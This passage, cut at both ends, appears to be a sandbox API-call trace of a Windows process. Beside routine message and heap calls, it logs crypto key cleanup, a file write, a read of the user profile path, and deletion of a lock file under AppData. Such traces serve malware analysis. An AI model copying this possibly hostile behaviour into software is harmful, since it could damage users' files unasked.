hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.786] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0204.786] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.786] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0204.786] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.786] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.787] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0204.787] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.787] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0204.787] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.787] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.787] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.787] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.787] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0204.787] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0204.787] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0204.787] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0204.787] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0204.787] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.787] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.787] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.787] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.787] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.787] WriteFile (in: hFile=0x4f4, lpBuffer=0x2a72698*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72698*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0204.788] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.788] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.788] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0204.788] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0204.788] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0204.788] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0204.788] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0204.788] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0204.788] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0204.789] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0204.789] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0204.789] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0204.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0204.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa8b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0204.789] CryptDestroyKey (hKey=0x9e1c38) returned 1 [0204.789] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0204.789] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0204.789] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0204.789] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0204.789] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0204.789] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0204.789] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0204.789] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0204.789] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0204.789] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0204.789] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0204.789] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0204.804] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0204.804] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0204.804] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0204.804] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0204.804] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0204.804] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0204.804] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0204.804] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0204.804] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0204.804] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0204.804] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0204.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.804] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0204.804] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.804] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0204.804] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.804] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.804] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0204.804] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.804] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0204.804] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.804] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.805] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.805] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.805] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0204.805] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0204.805] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0204.805] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0204.805] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0204.805] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.805] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0204.805] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0204.805] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0204.805] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0204.805] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0204.805] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0204.805] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0204.805] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0204.805] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0204.805] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0204.805] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0204.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0204.805] CryptReleaseContext (hProv=0xa7c220, dwFlags=0x0) returned 1 [0204.806] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.806] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0204.807] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0204.807] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0204.807] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0204.807] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0204.807] FreeLibrary (hLibModule=0x76390000) returned 1 [0204.807] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.807] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.807] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.807] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.807] CloseHandle (hObject=0x4f4) returned 1 [0204.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.808] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0204.808] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0204.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0204.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0204.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0204.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0204.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0204.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0204.809] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0204.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0204.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0204.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0204.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0204.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0204.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0204.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0204.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0204.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0204.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0204.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0204.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x44) returned 0x2a5d7a0 [0204.810] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/UNP", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpFilePart=0x8cedf4*="UNP") returned 0x21 [0204.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d7a0 | out: hHeap=0x2af0000) returned 1 [0204.810] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\UNP" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\unp")) returned 0x10 [0204.811] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\UNP\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xd3023f2d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf56c97e4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1bf8 [0204.811] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xd3023f2d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf56c97e4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0204.811] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xf56c97e4, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0xf56c97e4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", cAlternateFileName="{91BE5~1")) returned 1 [0204.811] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\UNP\\.{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\unp\\.{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock")) returned 1 [0204.812] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xf56c97e4, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0xf56c97e4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", cAlternateFileName="{91BE5~1")) returned 0 [0204.812] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0204.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0204.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0204.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 